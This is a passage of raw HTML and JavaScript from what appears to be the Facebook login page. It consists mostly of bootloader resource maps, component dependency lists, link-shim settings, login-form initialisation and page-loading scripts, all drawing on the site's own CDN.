}, "wyoZfpv": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ihBt4\/yg\/l\/en_GB\/a5N2I08n26r.js?_nc_x=Ij3Wp8lg5Kz" }, "1PDa5uS": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iHwg4\/yn\/l\/en_GB\/rkNe8_ZBD8D.js?_nc_x=Ij3Wp8lg5Kz" }, "eSpBqcn": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yN\/r\/w70UYVEps0P.js?_nc_x=Ij3Wp8lg5Kz" }, "xP1R8CA": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iLl54\/yb\/l\/en_GB\/ksuUTddFQhg.js?_nc_x=Ij3Wp8lg5Kz" }, "zlCkV6G": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iAiU4\/yp\/l\/en_GB\/5QnQKySbsSR.js?_nc_x=Ij3Wp8lg5Kz" }, "A63vnnR": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yO\/r\/TRf0FciNAyh.js?_nc_x=Ij3Wp8lg5Kz" }, "lRnn76M": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ibcU4\/yR\/l\/en_GB\/EJuL6VSNCy1.js?_nc_x=Ij3Wp8lg5Kz" }, "mnKy\/Yn": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3im6d4\/yp\/l\/en_GB\/-BEhsj6CSgs.js?_nc_x=Ij3Wp8lg5Kz" }, "gWMJgTe": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yH\/r\/iGksp69foR_.js?_nc_x=Ij3Wp8lg5Kz" }, "hIek+bG": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yY\/r\/DZ_VBlsy-dC.js?_nc_x=Ij3Wp8lg5Kz" }, "dm8EIZs": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yK\/r\/CHo_1wYLV1O.js?_nc_x=Ij3Wp8lg5Kz" }, "xIwdAub": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iTfb4\/yN\/l\/en_GB\/vTFiT95XYmp.js?_nc_x=Ij3Wp8lg5Kz" }, "sqdif1t": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iQL_4\/yC\/l\/en_GB\/zC2Z0ki7TZW.js?_nc_x=Ij3Wp8lg5Kz" }, "x22Oby4": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y0\/r\/fN3cCj7Il4D.js?_nc_x=Ij3Wp8lg5Kz" }, "8ELCBwH": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ye\/r\/VRzSVH5iU-V.js?_nc_x=Ij3Wp8lg5Kz" }, "SWx3yNv": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/O_SjdcR-xKL.js?_nc_x=Ij3Wp8lg5Kz" }, "oE4DofT": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yJ\/r\/EejAgnHUad4.js?_nc_x=Ij3Wp8lg5Kz" }, "VvVFw8n": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yn\/r\/AWepvf-vdZG.js?_nc_x=Ij3Wp8lg5Kz" }, "1Rv\/+Xz": { "type": "js", "src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yu\/r\/XaPDIOxwUYb.js?_nc_x=Ij3Wp8lg5Kz" }, "P\/mr5VE": { "type": "css", "src": "data:text\/css; charset=utf-8,\u002523bootloader_P_mr5VE{height:42px;}.bootloader_P_mr5VE{display:block!important;}", "nc": 1, "d": 1 } }, "compMap": { "ODS": { "r": ["i4ulAqS"], "be": 1 }, "Dock": { "r": ["fijQxTO", "hrQ+dST", "K8Tkk+K", "nRLDAVe", "x9SVR1B", "j7ouj5h", "i4ulAqS", "wBcCFVS", "ygoD\/GA"], "be": 1 }, "WebSpeedInteractionsTypedLogger": { "r": ["kCH74Pf", "i4ulAqS", "VYX+Uc1"], "rds": { "m": ["BanzaiScuba_DEPRECATED"] }, "be": 1 }, "AsyncRequest": { "r": ["Ak7k+E5", "fijQxTO", "K8Tkk+K", "j7ouj5h", "i4ulAqS", "hrQ+dST"], "rds": { "m": ["FbtLogging", "IntlQtEventFalcoEvent"], "r": ["wBcCFVS"] }, "be": 1 }, "DOM": { "r": ["K8Tkk+K", "j7ouj5h", "hrQ+dST"], "be": 1 }, "Form": { "r": ["K8Tkk+K", "x9SVR1B", "j7ouj5h", "hrQ+dST"], "be": 1 }, "FormSubmit": { "r": ["Ak7k+E5", "fijQxTO", "K8Tkk+K", "x9SVR1B", "j7ouj5h", "i4ulAqS", "OxA+Wgt", "hrQ+dST"], "rds": { "m": ["FbtLogging", "IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED"], "r": ["wBcCFVS"] }, "be": 1 }, "Input": { "r": ["x9SVR1B"], "be": 1 }, "Live": { "r": ["fijQxTO", "2\/maQ\/Q", "K8Tkk+K", "j7ouj5h", "i4ulAqS", "qjUZXT\/", "2CbDRJL", "hrQ+dST"], "be": 1 }, "Toggler": { "r": ["fijQxTO", "hrQ+dST", "K8Tkk+K", "nRLDAVe", "x9SVR1B", "j7ouj5h", "i4ulAqS", "wBcCFVS", "ygoD\/GA"], "be": 1 }, "Tooltip": { "r": ["7cukL\/U", "Ak7k+E5", "dXlZ41I", "fijQxTO", "hrQ+dST", "K8Tkk+K", "nRLDAVe", "x9SVR1B", "j7ouj5h", "i4ulAqS", "wBcCFVS", "jIgZ84k", "k6PP1ED", "VYX+Uc1"], "rds": { "m": ["FbtLogging", "IntlQtEventFalcoEvent", "PageTransitions", "BanzaiScuba_DEPRECATED", "Animation"] }, "be": 1 }, "URI": { "r": [], "be": 1 }, "trackReferrer": { "r": [], "rds": { "m": ["BanzaiScuba_DEPRECATED"], "r": ["i4ulAqS"] }, "be": 1 }, "PhotoTagApproval": { "r": ["lCiWnqM", "56VCh9H", "K8Tkk+K", "j7ouj5h", "hrQ+dST"], "be": 1 }, "PhotoSnowlift": { "r": ["7cukL\/U", "LAwnrBZ", "lCiWnqM", "Ak7k+E5", "LHrFeMg", "yDCO5VH", "i89GxPT", "LMy7abA", "0VY7AKa", "Jujczgk", "45g2zGz", "dXlZ41I", "Kzwq6Gp", "r\/uc3bI", "Dq8u3wo", "qLVlwK6", "KnHLe0g", "4165MiE", "XNjXVmx", "zVEN6sn", "NLRElBb", "Scqncyq", "H\/u0oAm", "sugpTJJ", "fijQxTO", "hrQ+dST", "rK9Eu5T", "eLfegN8", "E47d7TK", "K8Tkk+K", "45foxCp", "nRLDAVe", "VYX+Uc1", "Af7ilQc", "x9SVR1B", "ZYYem5O", "PAr9NV8", "j7ouj5h", "Vws9yNg", "i4ulAqS", "Dg0yxcL", "qjUZXT\/", "9ebCY1Y", "6Xe9Ood", "0kukt1t", "ejPqH9p", "wBcCFVS", "nMb1358", "zPLgIGT", "FJvGK\/j", "zTZTipw", "O47flqQ", "2CbDRJL", "jIgZ84k", "mDyabti", "ygoD\/GA", "rQNXMsL", "k6PP1ED"], "rds": { "m": ["Animation", "VisualCompletionGating", "FbtLogging", "IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED", "PageTransitions"] }, "be": 1 }, "PhotoTagger": { "r": ["7cukL\/U", "GxNObu9", "2nBQd0w", "lCiWnqM", "MqpG8ge", "f4p3vYU", "YqWOm9l", "aF9iPHd", "+u9G3gN", "Ak7k+E5", "0VY7AKa", "TuiPcIO", "FH2jy2l", "Jujczgk", "45g2zGz", "dXlZ41I", "Kzwq6Gp", "r\/uc3bI", "Dq8u3wo", "qLVlwK6", "sZXmT5E", "KnHLe0g", "i8nkeln", "dsV5VvK", "4165MiE", "jj29UZB", "XNjXVmx", "zVEN6sn", "NLRElBb", "9jeSk45", "Scqncyq", "EmFhCQC", "RJ82Y0Y", "56VCh9H", "H\/u0oAm", "sugpTJJ", "fijQxTO", "hrQ+dST", "rK9Eu5T", "eLfegN8", "npROeLX", "E47d7TK", "K8Tkk+K", "45foxCp", "nRLDAVe", "0m3+qD3", "4Mhs36H", "VYX+Uc1", "Af7ilQc", "x9SVR1B", "ZYYem5O", "j7ouj5h", "8Z0Ev\/x", "Vws9yNg", "SrpP6vx", "i4ulAqS", "qjUZXT\/", "9ebCY1Y", "ejPqH9p", "rVKs1ll", "wBcCFVS", "nMb1358", "GQaWz8T", "OxA+Wgt", "m+Iv8v9", "xeZxb4y", "kyWuS\/P", "zPLgIGT", "FJvGK\/j", "TGOK6VK", "zTZTipw", "2CbDRJL", "jIgZ84k", "mDyabti", "ygoD\/GA", "rQNXMsL", "xXr6omd", "k6PP1ED", "NaRov2Z", "nQ1LPEi", "ovx4rrL"], "rdfds": { "m": ["GamesVideoModerationRulesNux.react", "GamesVideoDeleteCommentDialog.react", "GamesVideoCommentRemovedDialog.react", "CometTooltipDeferredImpl.react"], "r": ["HvMFJzQ", "wyoZfpv", "i89GxPT", "1PDa5uS", "eSpBqcn", "xP1R8CA", "zlCkV6G", "A63vnnR"] }, "rds": { "m": ["PresenceStatus", "FbtLogging", "IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED", "Animation", "PageTransitions", "LynxAsyncCallbackFalcoEvent", "CometSuspenseFalcoEvent"], "r": ["lRnn76M"] }, "be": 1 }, "PhotoTags": { "r": ["lCiWnqM", "56VCh9H", "K8Tkk+K", "x9SVR1B", "j7ouj5h", "hrQ+dST"], "be": 1 }, "TagTokenizer": { "r": ["mnKy\/Yn", "Dq8u3wo", "56VCh9H", "hrQ+dST", "K8Tkk+K", "Af7ilQc", "x9SVR1B", "PAr9NV8", "j7ouj5h", "i4ulAqS", "Dg0yxcL", "TGOK6VK"], "rds": { "m": ["FbtLogging", "IntlQtEventFalcoEvent"], "r": ["wBcCFVS"] }, "be": 1 }, "AsyncDialog": { "r": ["7cukL\/U", "Ak7k+E5", "dXlZ41I", "Dq8u3wo", "Scqncyq", "H\/u0oAm", "fijQxTO", "hrQ+dST", "K8Tkk+K", "45foxCp", "nRLDAVe", "x9SVR1B", "j7ouj5h", "i4ulAqS", "wBcCFVS", "nMb1358", "zTZTipw", "jIgZ84k", "ygoD\/GA", "rQNXMsL", "k6PP1ED", "VYX+Uc1"], "rds": { "m": ["FbtLogging", "IntlQtEventFalcoEvent"] }, "be": 1 }, "Hovercard": { "r": ["7cukL\/U", "GxNObu9", "aF9iPHd", "Ak7k+E5", "dXlZ41I", "Dq8u3wo", "EmFhCQC", "fijQxTO", "hrQ+dST", "K8Tkk+K", "nRLDAVe", "VYX+Uc1", "x9SVR1B", "ZYYem5O", "j7ouj5h", "Vws9yNg", "i4ulAqS", "wBcCFVS", "kyWuS\/P", "jIgZ84k", "ygoD\/GA", "k6PP1ED"], "rds": { "m": ["FbtLogging", "IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED", "PageTransitions", "Animation"] }, "be": 1 }, "XSalesPromoWWWDetailsDialogAsyncController": { "r": ["gWMJgTe"], "be": 1 }, "XOfferController": { "r": ["hIek+bG"], "be": 1 }, "PerfXSharedFields": { "r": ["i4ulAqS"], "be": 1 }, "KeyEventTypedLogger": { "r": ["i4ulAqS", "dm8EIZs", "VYX+Uc1"], "rds": { "m": ["BanzaiScuba_DEPRECATED"] }, "be": 1 }, "Dialog": { "r": ["Ak7k+E5", "fijQxTO", "hrQ+dST", "eLfegN8", "K8Tkk+K", "nRLDAVe", "x9SVR1B", "ZYYem5O", "j7ouj5h", "i4ulAqS", "wBcCFVS", "ygoD\/GA", "jIgZ84k", "VYX+Uc1"], "rds": { "m": ["FbtLogging", "IntlQtEventFalcoEvent", "Animation", "PageTransitions", "BanzaiScuba_DEPRECATED"] }, "be": 1 }, "ExceptionDialog": { "r": ["7cukL\/U", "xIwdAub", "Ak7k+E5", "dXlZ41I", "Kzwq6Gp", "r\/uc3bI", "Dq8u3wo", "Scqncyq", "EmFhCQC", "H\/u0oAm", "sugpTJJ", "fijQxTO", "hrQ+dST", "E47d7TK", "K8Tkk+K", "45foxCp", "nRLDAVe", "x9SVR1B", "j7ouj5h", "i4ulAqS", "wBcCFVS", "nMb1358", "zTZTipw", "jIgZ84k", "ygoD\/GA", "rQNXMsL", "k6PP1ED", "VYX+Uc1"], "rds": { "m": ["FbtLogging", "IntlQtEventFalcoEvent"] }, "be": 1 }, "QuickSandSolver": { "r": ["sqdif1t", "Ak7k+E5", "KnHLe0g", "x22Oby4", "fijQxTO", "K8Tkk+K", "x9SVR1B", "j7ouj5h", "i4ulAqS", "8ELCBwH", "SWx3yNv", "hrQ+dST"], "rds": { "m": ["FbtLogging", "IntlQtEventFalcoEvent"], "r": ["wBcCFVS"] }, "be": 1 }, "ConfirmationDialog": { "r": ["oE4DofT", "K8Tkk+K", "x9SVR1B", "j7ouj5h", "hrQ+dST"], "be": 1 }, "QPLInspector": { "r": ["VvVFw8n"], "be": 1 }, "ReactDOM": { "r": ["jIgZ84k", "VYX+Uc1", "j7ouj5h", "k6PP1ED", "hrQ+dST"], "be": 1 }, "ContextualLayerInlineTabOrder": { "r": ["hrQ+dST", "K8Tkk+K", "x9SVR1B", "j7ouj5h", "wBcCFVS", "kyWuS\/P", "zPLgIGT"], "be": 1 }, "XUIDialogButton.react": { "r": ["Ak7k+E5", "dXlZ41I", "r\/uc3bI", "Dq8u3wo", "Scqncyq", "H\/u0oAm", "sugpTJJ", "fijQxTO", "K8Tkk+K", "45foxCp", "nRLDAVe", "x9SVR1B", "j7ouj5h", "i4ulAqS", "nMb1358", "zTZTipw", "jIgZ84k", "ygoD\/GA", "k6PP1ED", "hrQ+dST", "VYX+Uc1"], "rds": { "m": ["FbtLogging", "IntlQtEventFalcoEvent"], "r": ["wBcCFVS"] }, "be": 1 }, "XUIDialogBody.react": { "r": ["dXlZ41I", "Kzwq6Gp", "r\/uc3bI", "Dq8u3wo", "nRLDAVe", "j7ouj5h", "jIgZ84k", "ygoD\/GA", "k6PP1ED", "VYX+Uc1", "i4ulAqS"], "be": 1 }, "XUIDialogFooter.react": { "r": ["dXlZ41I", "Kzwq6Gp", "r\/uc3bI", "Dq8u3wo", "EmFhCQC", "nRLDAVe", "j7ouj5h", "jIgZ84k", "ygoD\/GA", "rQNXMsL", "k6PP1ED", "VYX+Uc1", "i4ulAqS"], "be": 1 }, "XUIDialogTitle.react": { "r": ["7cukL\/U", "Ak7k+E5", "dXlZ41I", "Scqncyq", "fijQxTO", "K8Tkk+K", "45foxCp", "nRLDAVe", "j7ouj5h", "i4ulAqS", "zTZTipw", "jIgZ84k", "ygoD\/GA", "rQNXMsL", "k6PP1ED", "hrQ+dST", "VYX+Uc1"], "rds": { "m": ["FbtLogging", "IntlQtEventFalcoEvent"], "r": ["wBcCFVS"] }, "be": 1 }, "XUIGrayText.react": { "r": ["dXlZ41I", "Kzwq6Gp", "r\/uc3bI", "Dq8u3wo", "nRLDAVe", "j7ouj5h", "jIgZ84k", "k6PP1ED", "VYX+Uc1", "i4ulAqS"], "be": 1 }, "DialogX": { "r": ["7cukL\/U", "fijQxTO", "hrQ+dST", "K8Tkk+K", "nRLDAVe", "x9SVR1B", "j7ouj5h", "i4ulAqS", "wBcCFVS", "ygoD\/GA"], "rds": { "m": ["FbtLogging", "IntlQtEventFalcoEvent"] }, "be": 1 }, "React": { "r": ["jIgZ84k", "VYX+Uc1"], "be": 1 } } }) });</script>
    <script>requireLazy(["InitialJSLoader"], function (InitialJSLoader) { InitialJSLoader.loadOnDOMContentReady(["fijQxTO", "1Rv\/+Xz", "dXlZ41I", "wBcCFVS", "x9SVR1B", "K8Tkk+K", "nRLDAVe", "i4ulAqS", "jIgZ84k", "Ak7k+E5", "j7ouj5h", "zPLgIGT", "VYX+Uc1", "k6PP1ED", "P\/mr5VE"]); });</script>
    <script>requireLazy(["TimeSliceImpl", "ServerJS"], function (TimeSlice, ServerJS) { var s = (new ServerJS()); s.handle({ "define": [["LinkshimHandlerConfig", [], { "supports_meta_referrer": true, "default_meta_referrer_policy": "origin-when-crossorigin", "switched_meta_referrer_policy": "origin", "non_linkshim_lnfb_mode": null, "link_react_default_hash": "AT0n679CD5gZGGcqYAXG7R7i2MCuQ1FNvDSOQrYfWK_R_snAXxd4wKN35qS1hXMIfchG_g3LrkJYO9emuMShZCVkzuPQOEJwejo5emtB-PC1h7MZY1BDGAzI3wgWK2ZkRPgMCOTE3u6y4s4_UHUaJ45CYzJS_bW5WVoLZA", "untrusted_link_default_hash": "AT2MjHQII33kxRR2U4vkOoX_QnoyRtFuicovOmMce3XBsltOTOmPENPYKQtWhPTCOe9CvxmNA8SCNNxLd-_x97zLQOrGePy7HpCSUQp531VppvvzPz1NcbTU3BL7YKw3KBB9oE_QPwp37jl0fwtOgd89HKHJlegfc2VWMg", "linkshim_host": "l.facebook.com", "linkshim_path": "\/l.php", "linkshim_enc_param": "h", "linkshim_url_param": "u", "use_rel_no_opener": true, "always_use_https": true, "onion_always_shim": true, "middle_click_requires_event": true, "www_safe_js_mode": "asynclazy", "m_safe_js_mode": "MLynx_asynclazy", "ghl_param_link_shim": false, "click_ids": [], "is_linkshim_supported": true, "current_domain": "facebook.com", "blocklisted_domains": ["ad.doubleclick.net", "ads-encryption-url-example.com", "bs.serving-sys.com", "ad.atdmt.com", "adform.net", "ad13.adfarm1.adition.com", "ilovemyfreedoms.com", "secure.adnxs.com"], "is_mobile_device": false }, 27]], "instances": [["__inst_5b4d0c00_0_0_\/3", ["Menu", "XUIMenuWithSquareCorner", "XUIMenuTheme"], [[], { "id": "u_0_0_+n", "behaviors": [{ "__m": "XUIMenuWithSquareCorner" }], "theme": { "__m": "XUIMenuTheme" } }], 2], ["__inst_5b4d0c00_0_1_bs", ["Menu", "MenuItem", "__markup_3310c079_0_0_IQ", "HTML", "__markup_3310c079_0_1_hL", "__markup_3310c079_0_2_M2", "__markup_3310c079_0_3_i9", "XUIMenuWithSquareCorner", "XUIMenuTheme"], [[{ "value": "key_shortcuts", "ctor": { "__m": "MenuItem" }, "markup": { "__m": "__markup_3310c079_0_0_IQ" }, "label": "Keyboard shortcut help...", "title": "", "className": null }, { "href": "\/help\/accessibility", "target": "_blank", "value": "help_center", "ctor": { "__m": "MenuItem" }, "markup": { "__m": "__markup_3310c079_0_1_hL" }, "label": "Accessibility Help Centre", "title": "", "className": null }, { "href": "\/help\/contact\/accessibility", "target": "_blank", "value": "submit_feedback", "ctor": { "__m": "MenuItem" }, "markup": { "__m": "__markup_3310c079_0_2_M2" }, "label": "Submit feedback", "title": "", "className": null }, { "href": "\/accessibility", "target": "_blank", "value": "facebook_page", "ctor": { "__m": "MenuItem" }, "markup": { "__m": "__markup_3310c079_0_3_i9" }, "label": "Updates from Facebook Accessibility", "title": "", "className": null }], { "id": "u_0_1_dN", "behaviors": [{ "__m": "XUIMenuWithSquareCorner" }], "theme": { "__m": "XUIMenuTheme" } }], 2], ["__inst_e5ad243d_0_0_Oo", ["PopoverMenu", "__inst_1de146dc_0_1_+H", "__elem_ec77afbd_0_1_GT", "__inst_5b4d0c00_0_1_bs"], [{ "__m": "__inst_1de146dc_0_1_+H" }, { "__m": "__elem_ec77afbd_0_1_GT" }, { "__m": "__inst_5b4d0c00_0_1_bs" }, []], 2], ["__inst_e5ad243d_0_1_Va", ["PopoverMenu", "__inst_1de146dc_0_0_sC", "__elem_ec77afbd_0_0_iO", "__inst_5b4d0c00_0_0_\/3"], [{ "__m": "__inst_1de146dc_0_0_sC" }, { "__m": "__elem_ec77afbd_0_0_iO" }, { "__m": "__inst_5b4d0c00_0_0_\/3" }, []], 2], ["__inst_1de146dc_0_0_sC", ["Popover", "__elem_1de146dc_0_0_sy", "__elem_ec77afbd_0_0_iO", "ContextualLayerAutoFlip", "ContextualDialogArrow"], [{ "__m": "__elem_1de146dc_0_0_sy" }, { "__m": "__elem_ec77afbd_0_0_iO" }, [{ "__m": "ContextualLayerAutoFlip" }, { "__m": "ContextualDialogArrow" }], { "alignh": "left", "position": "below" }], 2], ["__inst_1de146dc_0_1_+H", ["Popover", "__elem_1de146dc_0_1_4N", "__elem_ec77afbd_0_1_GT", "ContextualLayerAutoFlip", "ContextualDialogArrow"], [{ "__m": "__elem_1de146dc_0_1_4N" }, { "__m": "__elem_ec77afbd_0_1_GT" }, [{ "__m": "ContextualLayerAutoFlip" }, { "__m": "ContextualDialogArrow" }], { "alignh": "right", "position": "below" }], 2]], "markup": [["__markup_3310c079_0_0_IQ", { "__html": "Keyboard shortcut help..." }, 1], ["__markup_3310c079_0_1_hL", { "__html": "Accessibility Help Centre" }, 1], ["__markup_3310c079_0_2_M2", { "__html": "Submit feedback" }, 1], ["__markup_3310c079_0_3_i9", { "__html": "Updates from Facebook Accessibility" }, 1]], "elements": [["__elem_a588f507_0_1_Yq", "u_0_3_PN", 1], ["__elem_3fc3da18_0_0_d1", "u_0_4_X2", 1], ["__elem_51be6cb7_0_0_hL", "u_0_5_ww", 1], ["__elem_1de146dc_0_0_sy", "u_0_6_Si", 1], ["__elem_ec77afbd_0_0_iO", "u_0_7_sN", 2], ["__elem_1de146dc_0_1_4N", "u_0_8_gY", 1], ["__elem_ec77afbd_0_1_GT", "u_0_9_PF", 2], ["__elem_a588f507_0_0_wk", "globalContainer", 2], ["__elem_a588f507_0_2_l9", "content", 1], ["__elem_835c633a_0_0_OU", "u_0_a_V0", 1], ["__elem_9f5fac15_0_0_WP", "passContainer", 1], ["__elem_558608f3_0_0_eA", "pass", 1], ["__elem_a588f507_0_3_R0", "u_0_b_3\/", 1], ["__elem_a588f507_0_4_ew", "u_0_c_JJ", 1], ["__elem_45d73b5d_0_0_1H", "u_0_d_eo", 1]], "require": [["ServiceWorkerLoginAndLogout", "login", [], []], ["WebPixelRatioDetector", "startDetecting", [], [false]], ["ScriptPath", "set", [], ["XIndexReduxController", "a1f3c513", { "imp_id": "0AOA5R2uQf1L7WZRa", "ef_page": null, "uri": "https:\/\/www.facebook.com\/" }]], ["UITinyViewportAction", "init", [], []], ["ResetScrollOnUnload", "init", ["__elem_a588f507_0_0_wk"], [{ "__m": "__elem_a588f507_0_0_wk" }]], ["AccessibilityWebVirtualCursorClickLogger", "init", ["__elem_a588f507_0_0_wk"], [[{ "__m": "__elem_a588f507_0_0_wk" }]]], ["KeyboardActivityLogger", "init", [], []], ["FocusRing", "init", [], []], ["ErrorMessageConsole", "listenForUncaughtErrors", [], []], ["HardwareCSS", "init", [], []], ["NavigationAssistantController", "init", ["__elem_3fc3da18_0_0_d1", "__elem_51be6cb7_0_0_hL", "__inst_5b4d0c00_0_0_\/3", "__inst_5b4d0c00_0_1_bs", "__inst_e5ad243d_0_0_Oo", "__inst_e5ad243d_0_1_Va"], [{ "__m": "__elem_3fc3da18_0_0_d1" }, { "__m": "__elem_51be6cb7_0_0_hL" }, { "__m": "__inst_5b4d0c00_0_0_\/3" }, { "__m": "__inst_5b4d0c00_0_1_bs" }, null, { "accessibilityPopoverMenu": { "__m": "__inst_e5ad243d_0_0_Oo" }, "globalPopoverMenu": null, "sectionsPopoverMenu": { "__m": "__inst_e5ad243d_0_1_Va" } }, true]], ["__inst_e5ad243d_0_1_Va"], ["__inst_1de146dc_0_0_sC"], ["__inst_e5ad243d_0_0_Oo"], ["__inst_1de146dc_0_1_+H"], ["LoginFormController", "init", ["__elem_835c633a_0_0_OU", "__elem_45d73b5d_0_0_1H"], [{ "__m": "__elem_835c633a_0_0_OU" }, { "__m": "__elem_45d73b5d_0_0_1H" }, null, true, { "pubKey": { "publicKey": "c34b981f78f84ff3469bf324c9e8beced870bff09ac645cabe71cfa865d27749", "keyId": 134 } }]], ["BrowserPrefillLogging", "initContactpointFieldLogging", [], [{ "contactpointFieldID": "email", "serverPrefill": "" }]], ["BrowserPrefillLogging", "initPasswordFieldLogging", [], [{ "passwordFieldID": "pass" }]], ["FocusListener"], ["FlipDirectionOnKeypress"], ["LoginFormToggle", "initToggle", ["__elem_a588f507_0_3_R0", "__elem_a588f507_0_4_ew", "__elem_558608f3_0_0_eA", "__elem_9f5fac15_0_0_WP"], [{ "__m": "__elem_a588f507_0_3_R0" }, { "__m": "__elem_a588f507_0_4_ew" }, { "__m": "__elem_558608f3_0_0_eA" }, { "__m": "__elem_9f5fac15_0_0_WP" }]], ["IntlUtils"], ["FBLynx", "setupDelegation", [], []], ["Animation"], ["PageTransitions"], ["RequireDeferredReference", "unblock", [], [["BanzaiScuba_DEPRECATED", "Animation", "FbtLogging", "IntlQtEventFalcoEvent", "PageTransitions"], "sd"]], ["RequireDeferredReference", "unblock", [], [["BanzaiScuba_DEPRECATED", "Animation", "FbtLogging", "IntlQtEventFalcoEvent", "PageTransitions"], "css"]], ["TimeSliceImpl"], ["HasteSupportData"], ["ServerJS"], ["Run"], ["InitialJSLoader"]], "contexts": [[{ "__m": "__elem_a588f507_0_1_Yq" }, true], [{ "__m": "__elem_a588f507_0_2_l9" }, true]] }); requireLazy(["Run"], function (Run) { Run.onAfterLoad(function () { s.cleanup(TimeSlice) }) }); });</script>
    <script>now_inl = (function () { var p = window.performance; return p && p.now && p.timing && p.timing.navigationStart ? function () { return p.now() + p.timing.navigationStart } : function () { return new Date().getTime() }; })(); window.__bigPipeFR = now_inl();</script>
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yp/l/0,cross/vccDNWxoJia.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y4/l/0,cross/QHV7EPCttxL.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yg/l/0,cross/3UhmsnNLars.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yM/r/RoTFtc-pTLh.js?_nc_x=Ij3Wp8lg5Kz" as="script"
        crossorigin="anonymous" nonce="uZn0pQB6" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3ij9m4/yj/l/en_GB/SMcHjaqIAfX.js?_nc_x=Ij3Wp8lg5Kz"
        as="script" crossorigin="anonymous" nonce="uZn0pQB6" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yh/r/kQ6ak39g_ll.js?_nc_x=Ij3Wp8lg5Kz" as="script"
        crossorigin="anonymous" nonce="uZn0pQB6" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yY/r/juq7-UwCfHa.js?_nc_x=Ij3Wp8lg5Kz" as="script"
        crossorigin="anonymous" nonce="uZn0pQB6" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yZ/r/Jhvid9xmsdT.js?_nc_x=Ij3Wp8lg5Kz" as="script"
        crossorigin="anonymous" nonce="uZn0pQB6" />
    <link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yY/l/0,cross/KsAUELQFghT.css?_nc_x=Ij3Wp8lg5Kz"
        as="style" crossorigin="anonymous" />
    <script>window.__bigPipeCtor = now_inl(); requireLazy(["BigPipe"], function (BigPipe) { define("__bigPipe", [], window.bigPipe = new BigPipe({ "forceFinish": true, "config": { "flush_pagelets_asap": true, "dispatch_pagelet_replayable_actions": false } })); });</script>
    <script
        nonce="uZn0pQB6">(function () { var n = now_inl(); requireLazy(["__bigPipe"], function (bigPipe) { bigPipe.beforePageletArrive("first_response", n); }) })();</script>
    <script
        nonce="uZn0pQB6">requireLazy(["__bigPipe"], (function (bigPipe) { bigPipe.onPageletArrive({ displayResources: ["slsgoRE", "Dq8u3wo", "hrQ+dST", "Ak7k+E5", "fijQxTO", "K8Tkk+K", "j7ouj5h", "i4ulAqS", "ygoD/GA", "P/mr5VE"], id: "first_response", phase: 0, last_in_phase: true, tti_phase: 0, all_phases: [63], hsrp: { hblp: { consistency: { rev: 1005189989 } } }, allResources: ["fijQxTO", "1Rv/+Xz", "dXlZ41I", "wBcCFVS", "x9SVR1B", "K8Tkk+K", "nRLDAVe", "i4ulAqS", "jIgZ84k", "Ak7k+E5", "j7ouj5h", "slsgoRE", "Dq8u3wo", "hrQ+dST", "ygoD/GA", "zPLgIGT", "P/mr5VE", "VYX+Uc1", "k6PP1ED"] }); }));</script>
    <script>requireLazy(["__bigPipe"], function (bigPipe) { bigPipe.setPageID("7074865264628579990-0") }); CavalryLogger.setPageID("7074865264628579990-0");</script>
    <script
        nonce="uZn0pQB6">(function () { var n = now_inl(); requireLazy(["__bigPipe"], function (bigPipe) { bigPipe.beforePageletArrive("last_response", n); }) })();</script>
    <script
        nonce="uZn0pQB6">requireLazy(["__bigPipe"], (function (bigPipe) { bigPipe.onPageletArrive({ displayResources: ["i4ulAqS"], id: "last_response", phase: 63, last_in_phase: true, the_end: true, jsmods: { define: [["TimeSliceInteractionSV", [], { on_demand_reference_counting: true, on_demand_profiling_counters: true, default_rate: 1000, lite_default_rate: 100, interaction_to_lite_coinflip: { ADS_INTERFACES_INTERACTION: 0, ads_perf_scenario: 0, ads_wait_time: 0, Event: 1 }, interaction_to_coinflip: { ADS_INTERFACES_INTERACTION: 1, ads_perf_scenario: 1, ads_wait_time: 1, Event: 100 }, enable_heartbeat: true, maxBlockMergeDuration: 0, maxBlockMergeDistance: 0, enable_banzai_stream: true, user_timing_coinflip: 50, banzai_stream_coinflip: 